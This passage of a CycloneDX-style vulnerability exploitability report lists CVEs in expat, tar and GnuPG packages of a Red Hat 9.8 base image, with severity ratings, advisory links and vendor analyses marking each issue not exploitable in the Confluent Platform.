          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/coreutils-single@8.32-41.el9_8?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n        linux-vdso.so.1 (0x0000ffff8cd00000)\n        libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n        libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n        libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n        libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n        /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)"
      }
    },
    {
      "id": "CVE-2026-56403",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        }
      ],
      "cwes": [
        190
      ],
      "description": "libexpat before 2.8.2 has an integer overflow in storeAtts.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56403"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56403"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1232"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56403"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56403"
        }
      ],
      "published": "2026-06-21T16:16:26+00:00",
      "updated": "2026-06-23T20:15:16+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.5.0-6.el9_8.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-56405",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L"
        }
      ],
      "cwes": [
        190
      ],
      "description": "libexpat before 2.8.2 has an integer overflow in getAttributeId.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56405"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56405"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1251"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56405"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56405"
        }
      ],
      "published": "2026-06-21T16:16:27+00:00",
      "updated": "2026-06-23T20:14:51+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.5.0-6.el9_8.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-56406",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        }
      ],
      "cwes": [
        190
      ],
      "description": "libexpat before 2.8.2 has an integer overflow in XML_ParseBuffer because it lacked a check that was present in XML_Parse.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56406"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56406"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1255"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56406"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56406"
        }
      ],
      "published": "2026-06-21T16:16:27+00:00",
      "updated": "2026-06-23T16:29:06+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.5.0-6.el9_8.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-56412",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L"
        }
      ],
      "cwes": [
        416
      ],
      "description": "libexpat before 2.8.2 does not consider XML_TOK_DATA_CHARS in doCdataSection and thus lacks handler call depth tracking for various calls from within handlers in cases of a policy violation. Thus, a use-after-free can occur. NOTE: this issue exists because of an incomplete fix for CVE-2026-50219.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56412"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56412"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1278"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56412"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56412"
        }
      ],
      "published": "2026-06-21T17:16:44+00:00",
      "updated": "2026-06-23T15:31:30+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.5.0-6.el9_8.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-5704",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        434
      ],
      "description": "A flaw was found in tar. A remote attacker could exploit this vulnerability by crafting a malicious archive, leading to hidden file injection with fully attacker-controlled content. This bypasses pre-extraction inspection mechanisms, potentially allowing an attacker to introduce malicious files onto a system without detection.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-5704"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/11/10"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/11/11"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/12/2"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-5704"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2455360"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5704"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8477-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8477-2"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8477-3"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-5704"
        }
      ],
      "published": "2026-04-06T16:16:42+00:00",
      "updated": "2026-06-17T10:59:31+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2",
          "versions": [
            {
              "version": "2:1.34-11.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-57062",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 2.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"
        }
      ],
      "cwes": [
        1284
      ],
      "description": "CMS (Cryptographic Message Syntax) parsing in gpgsm in GnuPG through 2.5.20 mishandles the CMS format for AES-GCM because aes-ICVlen is supposed to be 12 bytes but 4 bytes is accepted. NOTE: this is related to CVE-2026-34182.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-57062"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-57062"
        },
        {
          "url": "https://blog.calif.io/p/how-to-format-a-ciphertext"
        },
        {
          "url": "https://github.com/advisories/GHSA-m6x2-4hhh-669j"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-57062"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-57062"
        },
        {
          "url": "https://www.gnupg.org/download"
        },
        {
          "url": "https://www.gnupg.org/download/"
        }
      ],
      "published": "2026-06-23T18:18:10+00:00",
      "updated": "2026-06-25T20:16:05+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.3.3-5.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-5713",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        121,
        125
      ],
